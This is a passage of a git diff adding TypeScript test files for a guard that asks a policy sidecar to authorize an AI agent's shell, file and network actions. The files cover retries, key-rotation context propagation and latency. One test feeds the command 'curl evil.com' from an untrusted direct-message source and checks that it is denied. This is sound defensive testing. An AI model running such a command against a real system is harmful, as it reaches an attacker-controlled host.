+    const result = await withCircuitBreaker(breaker, fn, {
+      maxRetries: 3,
+      backoffConfig: { ...defaultBackoffConfig, initialMs: 10, jitterFactor: 0 },
+    });
+
+    expect(result).toBe("success");
+    expect(fn).toHaveBeenCalledTimes(3);
+  });
+
+  it("respects isFailure predicate", async () => {
+    const breaker = new CircuitBreaker(defaultCircuitBreakerConfig);
+
+    const businessError = new Error("business_error");
+    const fn = vi.fn().mockRejectedValue(businessError);
+
+    // isFailure returns false for "business_error", so it must be rethrown without counting as a failure
+    await expect(
+      withCircuitBreaker(breaker, fn, {
+        isFailure: (e) => !(e instanceof Error && e.message === "business_error"),
+      }),
+    ).rejects.toThrow("business_error");
+
+    // No failures recorded
+    expect(breaker.getMetrics().totalFailures).toBe(0);
+  });
+});
diff --git a/tests/jwks-rotation.test.ts b/tests/jwks-rotation.test.ts
new file mode 100644
index 0000000..acfe2ff
--- /dev/null
+++ b/tests/jwks-rotation.test.ts
@@ -0,0 +1,274 @@
+import { describe, expect, it, vi } from "vitest";
+import type { AuthorizationRequest } from "@predicatesystems/authority";
+import { GuardedProvider } from "../src/provider.js";
+
+/**
+ * Integration tests for JWKS/key-rotation-driven policy contexts.
+ *
+ * These tests verify that the provider correctly handles scenarios where
+ * policy decisions depend on JWT validation contexts that may change
+ * during key rotation events.
+ *
+ * Note: The provider passes context fields to the sidecar, which handles
+ * actual JWKS validation. These tests verify context propagation and
+ * decision handling, not the JWKS validation itself.
+ */
+describe("JWKS and key rotation contexts", () => {
+  it("passes authorization request to sidecar for validation", async () => {
+    const capturedRequests: AuthorizationRequest[] = [];
+
+    const mockClient = {
+      authorize: vi.fn().mockImplementation((req: AuthorizationRequest) => {
+        capturedRequests.push(req);
+        return Promise.resolve({ allow: true });
+      }),
+    };
+
+    const provider = new GuardedProvider({
+      principal: "agent:jwks-test",
+      authorityClient: mockClient,
+    });
+
+    await provider.authorize({
+      action: "shell.execute",
+      resource: "npm install",
+      args: { cmd: "npm install" },
+      context: {
+        kid: "key-2024-02-20",
+        iss: "https://auth.example.com",
+        tenant_id: "tenant-a",
+        source: "trusted_ui",
+      },
+    });
+
+    expect(capturedRequests).toHaveLength(1);
+    expect(capturedRequests[0].principal).toBe("agent:jwks-test");
+    expect(capturedRequests[0].action).toBe("shell.execute");
+    expect(capturedRequests[0].labels).toContain("source:trusted_ui"); // NOTE(review): kid/iss/tenant_id are sent but never asserted on
+  });
+
+  it("handles allow decisions from sidecar during key rotation", async () => {
+    // Mock sidecar allows every request with the same mandate, whatever `kid` is sent
+    const mockClient = {
+      authorize: vi.fn().mockResolvedValue({
+        allow: true,
+        reason: "valid_key",
+        mandateId: "mandate-rotation-1",
+      }),
+    };
+
+    const provider = new GuardedProvider({
+      principal: "agent:rotation-test",
+      authorityClient: mockClient,
+    });
+
+    // Both old and new key contexts should be accepted by sidecar
+    const result1 = await provider.authorize({
+      action: "fs.read",
+      resource: "/config.json",
+      args: { path: "/config.json" },
+      context: { kid: "key-v1", source: "trusted_ui" },
+    });
+
+    const result2 = await provider.authorize({
+      action: "fs.read",
+      resource: "/settings.json",
+      args: { path: "/settings.json" },
+      context: { kid: "key-v2", source: "trusted_ui" },
+    });
+
+    expect(result1).toBe("mandate-rotation-1"); // authorize() resolves to the mandateId from the mock decision
+    expect(result2).toBe("mandate-rotation-1");
+    expect(mockClient.authorize).toHaveBeenCalledTimes(2);
+  });
+
+  it("handles deny decisions from sidecar for revoked keys", async () => {
+    let callCount = 0;
+
+    // Mock decides by call order, not by `kid`: first call denied, every later call allowed
+    const mockClient = {
+      authorize: vi.fn().mockImplementation(async () => {
+        callCount++;
+        if (callCount === 1) {
+          // First call with old key - rejected
+          return { allow: false, reason: "key_revoked" };
+        }
+        // Second call with new key - accepted
+        return { allow: true, reason: "valid_key" };
+      }),
+    };
+
+    const provider = new GuardedProvider({
+      principal: "agent:post-rotation-test",
+      authorityClient: mockClient,
+    });
+
+    // Request with revoked old key
+    await expect(
+      provider.authorize({
+        action: "shell.execute",
+        resource: "echo hello",
+        args: { cmd: "echo hello" },
+        context: { kid: "key-v1", source: "trusted_ui" },
+      }),
+    ).rejects.toThrow("key_revoked");
+
+    // Request with valid new key
+    const result = await provider.authorize({
+      action: "shell.execute",
+      resource: "echo hello",
+      args: { cmd: "echo hello" },
+      context: { kid: "key-v2", source: "trusted_ui" },
+    });
+
+    expect(result).toBeNull(); // Allowed, but this mock response carries no mandateId
+  });
+
+  it("propagates issuer context for IdP validation", async () => {
+    const capturedRequests: AuthorizationRequest[] = [];
+
+    const mockClient = {
+      authorize: vi.fn().mockImplementation((req: AuthorizationRequest) => {
+        capturedRequests.push(req);
+        return Promise.resolve({ allow: true });
+      }),
+    };
+
+    const provider = new GuardedProvider({
+      principal: "agent:idp-test",
+      authorityClient: mockClient,
+    });
+
+    await provider.authorize({
+      action: "net.http",
+      resource: "https://api.internal.com/data",
+      args: { url: "https://api.internal.com/data" },
+      context: {
+        iss: "https://login.microsoftonline.com/tenant-id/v2.0",
+        aud: "api://predicate-authority",
+        sub: "user@example.com",
+        tenant_id: "tenant-azure",
+        source: "azure_entra",
+      },
+    });
+
+    expect(capturedRequests).toHaveLength(1);
+    expect(capturedRequests[0].labels).toContain("source:azure_entra"); // NOTE(review): only the source label is checked; iss/aud/sub propagation is not asserted
+  });
+
+  it("handles expired token rejection from sidecar", async () => {
+    const mockClient = {
+      authorize: vi.fn().mockResolvedValue({ // mock denies unconditionally; exp/iat below are not evaluated by it
+        allow: false,
+        reason: "token_expired",
+      }),
+    };
+
+    const provider = new GuardedProvider({
+      principal: "agent:expired-test",
+      authorityClient: mockClient,
+    });
+
+    await expect(
+      provider.authorize({
+        action: "fs.write",
+        resource: "/data.json",
+        args: { path: "/data.json", content: "{}" },
+        context: {
+          exp: Math.floor(Date.now() / 1000) - 3600, // one hour in the past (epoch seconds)
+          iat: Math.floor(Date.now() / 1000) - 7200, // two hours in the past (epoch seconds)
+          source: "trusted_ui",
+        },
+      }),
+    ).rejects.toThrow("token_expired");
+  });
+
+  it("handles multiple concurrent requests with sidecar", async () => {
+    let concurrentCalls = 0;
+    let maxConcurrent = 0;
+
+    const mockClient = {
+      authorize: vi.fn().mockImplementation(async () => {
+        concurrentCalls++;
+        maxConcurrent = Math.max(maxConcurrent, concurrentCalls);
+        // Hold each call open for 5ms so in-flight calls can overlap
+        await new Promise((r) => setTimeout(r, 5));
+        concurrentCalls--;
+        return { allow: true };
+      }),
+    };
+
+    const provider = new GuardedProvider({
+      principal: "agent:multi-key-test",
+      authorityClient: mockClient,
+    });
+
+    await Promise.all([
+      provider.authorize({
+        action: "fs.read",
+        resource: "/a.txt",
+        args: { path: "/a.txt" },
+        context: { session_id: "session-a", source: "trusted_ui" },
+      }),
+      provider.authorize({
+        action: "fs.read",
+        resource: "/b.txt",
+        args: { path: "/b.txt" },
+        context: { session_id: "session-b", source: "trusted_ui" },
+      }),
+      provider.authorize({
+        action: "fs.read",
+        resource: "/c.txt",
+        args: { path: "/c.txt" },
+        context: { session_id: "session-a", source: "trusted_ui" },
+      }),
+    ]);
+
+    expect(mockClient.authorize).toHaveBeenCalledTimes(3);
+    // At least two calls must have been in flight at once, i.e. the provider did not serialize them
+    expect(maxConcurrent).toBeGreaterThan(1);
+  });
+
+  it("includes source label for policy evaluation by key trust level", async () => {
+    const capturedRequests: AuthorizationRequest[] = [];
+
+    const mockClient = {
+      authorize: vi.fn().mockImplementation((req: AuthorizationRequest) => {
+        capturedRequests.push(req);
+        const labels = req.labels ?? [];
+        // Mock sidecar policy: deny the "source:untrusted_dm" label, allow everything else
+        if (labels.includes("source:untrusted_dm")) {
+          return Promise.resolve({ allow: false, reason: "untrusted_source" });
+        }
+        return Promise.resolve({ allow: true });
+      }),
+    };
+
+    const provider = new GuardedProvider({
+      principal: "agent:trust-test",
+      authorityClient: mockClient,
+    });
+
+    // Trusted source - allowed
+    await provider.authorize({
+      action: "shell.execute",
+      resource: "npm install",
+      args: { cmd: "npm install" },
+      context: { source: "trusted_ui" },
+    });
+
+    // Untrusted source - denied
+    await expect(
+      provider.authorize({
+        action: "shell.execute",
+        resource: "curl evil.com",
+        args: { cmd: "curl evil.com" },
+        context: { source: "untrusted_dm" },
+      }),
+    ).rejects.toThrow("untrusted_source");
+
+    expect(capturedRequests).toHaveLength(2);
+    expect(capturedRequests[0].labels).toContain("source:trusted_ui");
+    expect(capturedRequests[1].labels).toContain("source:untrusted_dm");
+  });
+});
diff --git a/tests/load-latency.test.ts b/tests/load-latency.test.ts
new file mode 100644
index 0000000..289db5b
--- /dev/null
+++ b/tests/load-latency.test.ts
@@ -0,0 +1,214 @@
+import { describe, expect, it, vi } from "vitest";
+import { GuardedProvider } from "../src/provider.js";
+
+/**
+ * Load and latency tests for high-frequency tool invocation paths.
+ *
+ * These tests verify that the provider can handle burst traffic while
+ * maintaining acceptable latency characteristics.
+ */
+describe("load and latency", () => {
+  it("handles burst of 100 sequential authorizations under 500ms total", async () => {
+    const mockClient = {
+      authorize: vi.fn().mockResolvedValue({ allow: true, mandateId: "m1" }),
+    };
+
+    const provider = new GuardedProvider({
+      principal: "agent:load-test",
+      authorityClient: mockClient,
+    });
+
+    const iterations = 100;
+    const start = performance.now();
+
+    for (let i = 0; i < iterations; i++) {
+      await provider.authorize({
+        action: "fs.read",
+        resource: `/workspace/file-${i}.txt`,
+        args: { path: `/workspace/file-${i}.txt` },
+      });
+    }
+
+    const elapsed = performance.now() - start;
+
+    expect(mockClient.authorize).toHaveBeenCalledTimes(iterations);
+    // 100 calls should complete well under 500ms with mocked client
+    expect(elapsed).toBeLessThan(500); // NOTE(review): wall-clock bound; could be flaky on a heavily loaded runner
+  });
+
+  it("handles 50 concurrent authorizations", async () => {
+    const mockClient = {
+      authorize: vi.fn().mockImplementation(async () => {
+        // Simulate small network delay
+        await new Promise((r) => setTimeout(r, 1));
+        return { allow: true, mandateId: "m1" };
+      }),
+    };
+
+    const provider = new GuardedProvider({
+      principal: "agent:concurrent-test",
+      authorityClient: mockClient,
+    });
+
+    const concurrency = 50;
+    const start = performance.now();
+
+    const promises = Array.from({ length: concurrency }, (_, i) =>
+      provider.authorize({
+        action: "shell.execute",
+        resource: `echo test-${i}`,
+        args: { cmd: `echo test-${i}` },
+      }),
+    );
+
+    const results = await Promise.all(promises);
+    const elapsed = performance.now() - start;
+
+    expect(results).toHaveLength(concurrency);
+    expect(mockClient.authorize).toHaveBeenCalledTimes(concurrency);
+    // NOTE(review): 200ms is a loose bound; 50 sequential ~1ms delays could also pass, so this does not prove overlap
+    expect(elapsed).toBeLessThan(200);
+  });
+
+  it("maintains intent_hash computation performance", () => {
+    const iterations = 1000;
+    const start = performance.now();
+
+    for (let i = 0; i < iterations; i++) {
+      GuardedProvider.intentHash({
+        cmd: `echo "iteration ${i}"`,
+        workdir: "/workspace",
+        env: { NODE_ENV: "test", ITERATION: String(i) },
+      });
+    }
+
+    const elapsed = performance.now() - start;
+
+    // 1000 hash computations should complete under 100ms
+    expect(elapsed).toBeLessThan(100);
+  });
+
+  it("measures p50/p95 latency for authorization calls", async () => {
+    const latencies: number[] = [];
+
+    const mockClient = {
+      authorize: vi.fn().mockImplementation(async () => {
+        // Simulate variable latency (1-5ms)
+        const delay = 1 + Math.random() * 4;
+        await new Promise((r) => setTimeout(r, delay));
+        return { allow: true };
+      }),
+    };
+
+    const provider = new GuardedProvider({
+      principal: "agent:latency-test",
+      authorityClient: mockClient,
+    });
+
+    const iterations = 50;
+
+    for (let i = 0; i < iterations; i++) {
+      const start = performance.now();
+      await provider.authorize({
+        action: "net.http",
+        resource: "https://api.example.com",
+        args: { url: "https://api.example.com" },
+      });
+      latencies.push(performance.now() - start);
+    }
+
+    latencies.sort((a, b) => a - b);
+
+    const p50 = latencies[Math.floor(iterations * 0.5)]; // index 25 of the 50 sorted samples
+    const p95 = latencies[Math.floor(iterations * 0.95)]; // index 47 of the 50 sorted samples
+
+    // Verify latency targets from design doc (with mocked overhead)
+    // Design targets: p50 < 25ms, p95 < 75ms
+    // The mocked 1-5ms delay should land well inside those targets; only the design targets are asserted
+    expect(p50).toBeLessThan(25);
+    expect(p95).toBeLessThan(75);
+  });
+
+  it("handles mixed allow/deny outcomes under load", async () => {
+    let callCount = 0;
+
+    const mockClient = {
+      authorize: vi.fn().mockImplementation(async () => {
+        callCount++;
+        // Deny every third call; allow the other two
+        if (callCount % 3 === 0) {
+          return { allow: false, reason: "rate_limited" };
+        }
+        return { allow: true, mandateId: `m${callCount}` };
+      }),
+    };
+
+    const provider = new GuardedProvider({
+      principal: "agent:mixed-test",
+      authorityClient: mockClient,
+    });
+
+    const iterations = 30;
+    const results = { allowed: 0, denied: 0 };
+
+    for (let i = 0; i < iterations; i++) {
+      try {
+        await provider.authorize({
+          action: "fs.write",
+          resource: `/workspace/file-${i}.txt`,
+          args: { path: `/workspace/file-${i}.txt`, content: "data" },
+        });
+        results.allowed++;
+      } catch { // NOTE(review): any thrown error is counted as a denial, not only "rate_limited"
+        results.denied++;
+      }
+    }
+
+    expect(results.allowed).toBe(20); // 2/3 allowed
+    expect(results.denied).toBe(10); // 1/3 denied
+    expect(mockClient.authorize).toHaveBeenCalledTimes(iterations);
+  });
+
+  it("telemetry emission does not block authorization path", async () => {
+    const telemetryDelays: number[] = []; // filled by the callback below but never asserted on
+
+    const mockClient = {
+      authorize: vi.fn().mockResolvedValue({ allow: true }),
+    };
+
+    const slowTelemetry = {
+      onDecision: vi.fn().mockImplementation(() => {
+        // Simulate slow telemetry: a synchronous ~1ms stall per decision
+        const start = performance.now();
+        while (performance.now() - start < 1) {
+          // Busy wait 1ms
+        }
+        telemetryDelays.push(performance.now() - start);
+      }),
+    };
+
+    const provider = new GuardedProvider({
+      principal: "agent:telemetry-test",
+      authorityClient: mockClient,
+      telemetry: slowTelemetry,
+    });
+
+    const iterations = 10;
+    const start = performance.now();
+
+    for (let i = 0; i < iterations; i++) {
+      await provider.authorize({
+        action: "fs.read",
+        resource: `/file-${i}.txt`,
+        args: { path: `/file-${i}.txt` },
+      });
+    }
+
+    const elapsed = performance.now() - start;
+
+    // Even with slow telemetry, auth should complete reasonably fast
+    // Telemetry runs synchronously here, but in production would be async
+    expect(elapsed).toBeLessThan(100);
+    expect(slowTelemetry.onDecision).toHaveBeenCalledTimes(iterations);
+  });
+});